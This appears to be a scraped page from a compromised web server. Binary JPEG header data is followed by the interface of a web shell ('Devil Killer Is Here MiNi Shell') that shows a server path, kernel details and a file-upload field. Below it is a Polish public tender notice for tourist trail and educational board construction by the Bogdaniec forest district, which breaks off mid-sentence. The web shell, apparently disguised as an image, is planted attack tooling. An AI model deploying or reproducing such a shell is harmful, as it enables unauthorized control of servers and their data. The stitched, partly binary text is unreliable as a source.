JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210831/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210831/0016524601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa infrastruktury turystycznej na terenie Nadleśnictwa Bogdaniec </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO BOGDANIEC</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 810539031</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Leśna 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bogdaniec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-450</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">95 728 43 50</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bogdaniec@szczecin.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bogdaniec.szczecin.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> LEŚNICTWO </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa infrastruktury turystycznej na terenie Nadleśnictwa Bogdaniec </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-82a327f2-0a43-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00165246</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00065592/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa infrastruktury turystycznej na terenie Nadleśnictwa Bogdaniec</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> POIS.02.04.00-00-0042/16 Obszary Natura 2000 szansą wzbogacenia różnorodności biologicznej Puszczy Gorzowskie </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/nadlesnictwo_bogdaniec <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/nadlesnictwo_bogdaniec</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy SmartPZP (dalej – „Platforma”). Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w zakładce „Korespondencja”. Sposób sporządzenia i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452).<br/>Za datę wpływu oświadczeń, ofert, wniosków, zaświadczeń oraz informacji przyjmuje się datę ich przekazania do Platformy. Aktualna data i godzina, zsynchronizowane z Głównym Urzędem Miar, wyświetlane są w prawym górnym rogu Platformy.<br/>W celu skorzystania z Platformy konieczna jest rejestracja Wykonawcy pod adresem: https://portal.smartpzp.pl/nadlesnictwo_bogdaniec po kliknięciu na przycisk „Załóż konto”. Wykonawca rejestrując się akceptuje warunki korzystania z Platformy, określone w Regulaminie podczas rejestracji oraz uznaje go za wiążący. Korzystanie z Platformy jest bezpłatne. Podgląd i pobieranie dokumentacji postępowania nie wymaga logowania. <br/>Zamawiający, informuje, że Platforma jest kompatybilna ze wszystkimi podpisami elektronicznymi. Do przesłania dokumentów i złożenia oferty nie jest niezbędne posiadanie certyfikatu kwalifikowanego. <br/>Szczegółowe informacje o sposobie pozyskania usługi kwalifikowanego podpisu elektronicznego oraz warunkach jej użycia można znaleźć na stronach internetowych kwalifikowanych dostawców usług zaufania, których lista znajduje się pod adresem internetowym: http://www.nccert.pl/kontakt.htm <br/>złożenie, zmiana i wycofanie oferty lub oferty następuje wyłącznie w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, za pośrednictwem Platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L<br/>119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych<br/>jest Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Bogdaniec, ul.<br/>Leśna 17, 66-450 Bogdaniec, tel. +48 95 728-43-50, , e-mail bogdaniec@szczecin.lasy.gov.pl.<br/>Administrator wyznaczył Inspektora Ochrony Danych Osobowych p. Karolina Kaczmarek, z którym w<br/>sprawach dotyczących przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod adresem rodo@szczecin.lasy.gov.pl. lub telefonicznie pod numerem +48 91<br/>432 87 12 .<br/>Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia<br/>publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia<br/>korzystania ze środków ochrony prawnej, o których mowa w dziale IX PZP, do upływu terminu do ich<br/>wniesienia.<br/>Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone<br/>wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do przetwarzania takich danych są<br/>obowiązane do zachowania ich w poufności<br/>Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego<br/>rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 255-256, 310 PZP – w<br/>celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania<br/>postępowania o udzielenie zamówienia i jego archiwizacji.<br/>Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania<br/>zostanie udostępniona w oparciu o przepisy PZP, a także na podstawie ustawy o dostępie do<br/>informacji publicznej..<br/>Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia<br/>publicznego. Niezależnie od postanowień pkt powyżej, w przypadku zawarcia umowy w sprawie<br/>zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia<br/>roszczeń wynikających z umowy w sprawie zamówienia publicznego. Dane osobowe pozyskane w<br/>związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane<br/>podmiotom świadczącym usługi doradcze, w tym usługi prawne, i konsultingowe.<br/>Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób<br/>zautomatyzowany.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osoba, której dotyczą pozyskane w związku z<br/>prowadzeniem niniejszego postępowania dane osobowe, ma prawo:<br/>1) dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w sytuacji, gdy<br/>wykonanie obowiązków, o których mowa w art. 15 ust. 1 -3 RODO wymagałoby niewspółmiernie<br/>dużego wysiłku Zamawiający może żądać wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty bieżącego bądź zakończonego<br/>postępowania o udzielenie zamówienia publicznego;<br/>2) do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czym skorzystanie z<br/>uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO,<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą<br/>postanowień umowy w zakresie niezgodnym z PZP oraz nie może naruszać integralności protokołu<br/>oraz jego załączników;<br/>3) do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego; prawo to nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia publicznego;<br/>4) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, iż<br/>przetwarzanie jej danych osobowych narusza przepisy o ochronie danych osobowych, w tym przepisy<br/>RODO.<br/>Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach PZP,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych określa PZP.<br/>Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z prowadzeniem<br/>niniejszego postępowania o udzielenie zamówienia publicznego nie przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, określone w art. 21<br/>RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą<br/>prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych<br/>podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania realizowane w<br/>interesie publicznym lub w ramach sprawowania władzy publicznej, w szczególności do podmiotów<br/>prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są przekazywane do<br/>podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.271.1.5.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 201037,98 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Rozbudowa ścieżki edukacyjnej w „Dolinie Trzech Młynów” w Bogdańcu, (Leśnictwo Łupowo).<br/>Projektuje się zagospodarowanie fragmentu ścieżki pomiędzy mostkiem przy zagrodzie<br/>młyńskiej (muzeum) a częścią ścieżki już urządzonej. Łączna długość ścieżki objętej<br/>zagospodarowaniem wynosi ok 250 m. Przyjęto że nowo powstały fragment ścieżki edukacyjnej<br/>będzie stanowił spójną kontynuację ścieżki już istniejącej.<br/>1) Przewiduje się wykonanie:<br/>• nawierzchni żwirowej ścieżki, wzmocnionej geokratą z obrzeżem z kostki betonowej, o łącznej<br/>długości ok. 250 mb (dopuszczalna tolerancja długości to +- 5 mb). Nawierzchnia ścieżki<br/>wzmocniona na szerokości około 1,50 m geokratą o wysokości minimum 5 cm wykonaną z<br/>polietylenu wysokociśnieniowego w kolorze czarnym, grubości ścianki 5 mm, wytrzymałości co<br/>najmniej 150t/m2 , odporności na promieniowanie UV oraz temperatury od – 25 ⁰C do + 80⁰ C,<br/>oddziaływanie na środowisko - obojętne, rozpuszczalność - odporna na działanie kwasów,<br/>ługów, alkoholi, olei i benzyny (posypywanie solą, amoniak, kwaśne deszcze itp.), odległość<br/>między zgrzewami – ok. 340 - 370 mm; trwałość geokraty min. 20 lat w gruntach naturalnych.<br/>Produkt zgodny z normą PN-EN13249:2016, lub równoważną<br/>Geokrata wypełniona zagęszczoną zasypką żwirową gr minimum 5 cm, poniżej zagęszczone<br/>warstwy: wyrównawcza z mieszanki grysowo-żwirowej gr. minimum 2,5 cm oraz odsączająca z<br/>piasku grubości co najmniej 10 cm. Nawierzchnię ścieżki należy układać na wyprofilowanym i<br/>zagęszczonym gruncie rodzimym. Obrzeża ścieżki należy wykonać z kostki brukowej granitowej<br/>16/20 cm ułożonej na podsypce piaskowo-cementowej<br/>• płotu-balustrady wzdłuż pobocza ścieżki od strony potoku, długości ok 145 m (dopuszczalna<br/>tolerancja długości to +- 5 mb). Ogrodzenie - balustrada wykonana z drewna toczonego. Słupki o<br/>średnicy co najmniej 15 cm z drewna robinii akacjowej lub dębowego o wysokości minimum 100<br/>cm powyżej poziomu gruntu. Słupki powinny być zakotwione w gruncie na głębokość co najmniej<br/>50 cm. Elementy poziome i skośne balustrady o średnicy co najmniej 12 cm wykonane z drewna<br/>świerkowego o dł. ok. 2,60-2,80 m. Drewno impregnowane dwukrotnie w kolorze typu<br/>„palisander królewski”. Balustrada będzie zamontowana wzdłuż utwardzonego odcinka ścieżki.<br/>2) Wykonanie i montaż dwóch sztuk urządzeń edukacyjnych oraz jednej tablicy informacyjnoedukacyjnej:<br/>• urządzenie edukacyjne w formie tablicy interaktywno - edukacyjnej o tematyce życia zwierząt i<br/>zależności pokarmowych. Tablica wykonana na podłożu z blachy ocynkowanej o wymiarach<br/>150x100 cm (w poziomie), zabezpieczona warstwą ochronną UV oraz antygraffiti; stelaż do<br/>tablicy z pełnym deskowaniem oraz daszkiem dwuspadowym, zabezpieczającym przed opadami<br/>atmosferycznymi, podłużnie deskowanym – zachodzącym na siebie, zakładka min. 2,5 cm.<br/>Stelaż wykonany z drewna modrzewiowego trzykrotnie impregnowanego, w kolorze typu<br/>„palisander królewski”. Pod tablicą 4 szt. obracanych graniastosłupów lub sześcianów o wym.<br/>ok. 30x30 cm każda, o tematyce przyrodniczej. Na boku każdego graniastosłupa należy<br/>umieścić treści oraz ilustracje związane tematycznie z treścią planszy umieszczonej powyżej<br/>nich. Wysokość stelaża ok. 285 cm (dopuszczalna tolerancja długości to +- 5 cm), słupy<br/>zakończone ocynkowanymi kotwami ulokowanymi w gruncie na zaprawie betonowej C16/20.<br/>Tablicę należy wykonać w technologii z przeznaczeniem na zewnątrz: nadruk wielkoformatowy<br/>solwentowy, pełnokolorowy lub polimerowa folia samoprzylepna o grubości min. 100 mikronów–<br/>materiał musi być trwały, odporny na warunki atmosferyczne, wodoodporny, estetyczny.<br/>Wykonawca zapewni autorskie opracowanie merytoryczne i graficzne tablic. Każda z nich<br/>zawierać będzie tekst oraz indywidualnie dopasowane: zdjęcia i/lub: schematy, mapy, logotypy,<br/>piktogramy itp., Treści, fotografie oraz pozostałe elementy graficzne umieszczane na tablicy<br/>będą uzgadniane z Zamawiającym, który może również złożyć swoje propozycje. Wszystkie<br/>fotografie oraz pozostałe elementy graficzne muszą być rzetelnie udokumentowane pod<br/>względem ich pochodzenia. Wykonawca zobowiązany będzie przenieść na zamawiającego<br/>prawa autorskie. Na żądanie Zamawiającego, Wykonawca wskaże szczegółowe źródło<br/>pochodzenia, np. autora oraz charakter ich nabycia (np. umowa licencyjna) celem weryfikacji.<br/>Wykonawca zapewnia Zamawiającemu nabycie rzeczy wolnych od wad prawnych oraz<br/>roszczeń osób trzecich. Przed wykonaniem tablicy edukacyjnej, Wykonawca zobowiązany jest<br/>do uzgodnienia z Zamawiającym projektu zadruku w celu uzyskania jego akceptacji.<br/>Zamawiający nie wyposaża w materiały tematyczne potrzebne do wykonania plansz tablic oraz<br/>urządzeń edukacyjnych (t. j. teksty, zdjęcia, grafiki). Wykonawca przedstawi Zamawiającemu<br/>projekty plansz w celu ustalenia ewentualnych poprawek lub jej akceptacji<br/>3) Urządzenie interaktywno-edukacyjne Mrowisko/kretowisko składające się z dwóch części<br/>przedstawiające życie kreta i mrówek<br/>Przy urządzeniu znajdować będzie się dwustronna tablica edukacyjno – informacyjna opisująca<br/>z jednej strony mrowisko (życie mrówek oraz budowę mrowiska) natomiast druga strona<br/>zawierać będzie opis i fotografie dot. życia i biologii kreta oraz budowę kretowiska. Tablica<br/>wykonana na podłożu z blachy ocynkowanej o wymiarach 75x100 cm (pion) zabezpieczona<br/>warstwą ochronną UV oraz antygraffiti. Stelaż tablicy będzie zawierał pełne deskowanie oraz<br/>będzie osadzony na dwóch słupach. Stelaż do tablicy wykonany z drewna modrzewiowego trzykrotnie impregnowanego, w kolorze typu „palisander królewski” Stelaż wyposażony zostanie<br/>w daszek dwustronny, zabezpieczającym przed opadami atmosferycznymi, podłużnie<br/>deskowanym – zachodzącym na siebie, zakładka min. 2,5 cm. Słupy stelaża zakończone<br/>ocynkowanymi kotwami ulokowanymi w gruncie na zaprawie betonowej B20. Wykonawca<br/>zapewni autorskie opracowanie merytoryczne i graficzne tablicy. Każda z nich zawierać będzie<br/>tekst oraz indywidualnie dopasowane: zdjęcia, i/lub: schematy, mapy, logotypy, piktogramy itp.,<br/>Wykonawca zobowiązany będzie przenieść na zamawiającego prawa autorskie. Treści,<br/>fotografie oraz pozostałe elementy graficzne umieszczane na tablicy będą uzgadniane z<br/>Zamawiającym, który może również złożyć swoje propozycje. Wszystkie fotografie oraz<br/>pozostałe elementy graficzne muszą być rzetelnie udokumentowane pod względem ich<br/>pochodzenia. Na żądanie Zamawiającego, Wykonawca wskaże szczegółowe źródło<br/>pochodzenia, np. autora oraz charakter ich nabycia (np. umowa licencyjna) celem weryfikacji.<br/>Wykonawca zapewnia Zamawiającemu nabycie rzeczy wolnych od wad prawnych oraz<br/>roszczeń osób trzecich. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 47743,83 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111291-4 - Roboty w zakresie zagospodarowania terenu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45223800-4 - Montaż i wznoszenie gotowych konstrukcji</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233161-5 - Roboty budowlane w zakresie ścieżek pieszych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert w każdej Części zamówienia Zamawiający będzie się<br/>kierował następującymi kryteriami oceny ofert:<br/>1) Cena – 60 %<br/>2) Okres gwarancji jakości – 40%<br/>Maksymalna liczba punktów w kryteriach równa jest określonej wadze dla tych kryteriów w %.<br/>Sposób obliczania punktów:<br/>1) W ramach 